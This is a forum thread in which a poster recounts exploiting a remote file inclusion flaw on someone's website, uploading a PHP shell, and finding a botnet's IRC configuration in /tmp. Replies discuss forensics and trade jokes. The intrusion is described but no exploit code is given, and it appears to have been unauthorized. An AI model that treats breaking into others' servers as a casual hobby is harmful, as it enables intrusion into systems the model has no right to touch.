Announcement

Collapse
No announcement yet.

Web assessment turns Botnet Tracking

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Web assessment turns Botnet Tracking

    Well about every night til the early mornings I like to perform web assessments to see what I can find in developers web applications. Usually its something different everyday. What I uncovered today was definitely something I do not do all the time. I had found a vulnerable php application on a website. The application was vulnerable to RFI more commonly known as remote file inclusion. So I uploaded a php shell and took a look around. First place I look of course is the /tmp directory. Of course most of you know, almost any user can run malicious code or upload application in the directory because of the permissions that set on it. Well before I could even think about doing something like that I viewed what was already in the directory and the first thing I saw was a "botnet.txt". So of course I "cat" the file and in the very beginning were the configuration to a IRC server and its botnet owner. Then I quickly copy and paste the configuration, then exit the file and remove the malicious code. After thinking for a bit I decided to go check out what really goes on in that server so here is what happens... http://pastebin.com/f561066df

    After that conversation I had to share it. Has anything you guys have done on a regular basis led you to something fun and interesting?


  • #2
    Re: Web assessment turns Botnet Tracking

    Originally posted by disablmalfunc View Post
    Well about every night til the early mornings I like to perform web assessments to see what I can find in developers web applications. Usually its something different everyday. What I uncovered today was definitely something I do not do all the time. I had found a vulnerable php application on a website. The application was vulnerable to RFI more commonly known as remote file inclusion. So I uploaded a php shell and took a look around. First place I look of course is the /tmp directory. Of course most of you know, almost any user can run malicious code or upload application in the directory because of the permissions that set on it. Well before I could even think about doing something like that I viewed what was already in the directory and the first thing I saw was a "botnet.txt". So of course I "cat" the file and in the very beginning were the configuration to a IRC server and its botnet owner. Then I quickly copy and paste the configuration, then exit the file and remove the malicious code. After thinking for a bit I decided to go check out what really goes on in that server so here is what happens... http://pastebin.com/f561066df

    After that conversation I had to share it. Has anything you guys have done on a regular basis led you to something fun and interesting?
    Did you leave the server with the botnet online? I would think the first thing you'd want to do is pull it offline.
    perl -e 'print pack(c5, (41*2), sqrt(7056), (unpack(c,H)-2), oct(115), 10)'

    Comment


    • #3
      Re: Web assessment turns Botnet Tracking

      I'd pull it offline and do full forensics on it to see what sort of nastiness has made its way on to the box

      I return whatever i wish . Its called FREEDOWM OF RANDOMNESS IN A HECK . CLUSTERED DEFEATED CORn FORUM . Welcome to me

      Comment


      • #4
        Re: Web assessment turns Botnet Tracking

        Sometimes just watching it for a bit will uncover the bots intention and perhaps even take you to its leader.

        Comment


        • #5
          Re: Web assessment turns Botnet Tracking

          Well I just recently started learning about intrusion forensic and it seems the papers and books I study, all have different thoughts on what to do if comprise. They all seem to agree is preserve the hard drives which I have done. What other things do you guys suggest should be the next step?

          Comment


          • #6
            Re: Web assessment turns Botnet Tracking

            pretty funny conversation, learned anything new about it?
            "The code itself sucked... it was not worth the $1.7 million they said"
            -Jonathan James

            Comment


            • #7
              Re: Web assessment turns Botnet Tracking

              Sounds quite interesting...

              For general knowledge "solitario" is a spanish word for lonely/alone; it also is a cards game though in this case I would think the owner went for the first choice.

              It is also an italian word for hermit but I am not sure it is part of the portuguese language.
              knowledge is power

              Comment


              • #8
                Re: Web assessment turns Botnet Tracking

                Originally posted by HANNAHHACKER View Post
                Sounds quite interesting...

                For general knowledge "solitario" is a spanish word for lonely/alone; it also is a cards game though in this case I would think the owner went for the first choice.

                It is also an italian word for hermit but I am not sure it is part of the portuguese language.
                :mind in gutter

                Or you could take it figuratively as playing with oneself. ;-)

                or to use Brit slang; he's a wanker!!!!! :-)

                :mind out of gutter.

                xor
                Just because you can doesn't mean you should. This applies to making babies, hacking, and youtube videos.

                Comment


                • #9
                  Re: Web assessment turns Botnet Tracking

                  Originally posted by disablmalfunc View Post
                  Well I just recently started learning about intrusion forensic and it seems the papers and books I study, all have different thoughts on what to do if comprise. They all seem to agree is preserve the hard drives which I have done. What other things do you guys suggest should be the next step?
                  I don't think you are doing him/her any favors by telling him/her to cover their tracks better. How else will they:

                  1. Get Caught
                  2. Make World News
                  3. Go To Prison
                  4. Write Security Book While In Prison
                  5. Get Out
                  6. Speak At Defcon
                  7. Land Security Consulting Job for Fortune 500 Making 6 Figurers.

                  :-)

                  xor
                  Just because you can doesn't mean you should. This applies to making babies, hacking, and youtube videos.

                  Comment


                  • #10
                    Re: Web assessment turns Botnet Tracking

                    Originally posted by xor View Post
                    I don't think you are doing him/her any favors by telling him/her to cover their tracks better. How else will they:

                    1. Get Caught
                    2. Make World News
                    3. Go To Prison
                    4. Write Security Book While In Prison
                    5. Get Out
                    6. Speak At Defcon
                    7. Land Security Consulting Job for Fortune 500 Making 6 Figurers.

                    :-)

                    xor
                    Haha True. Then we would have nothing to look forward to. ^_^

                    Comment

                    Working...
                    X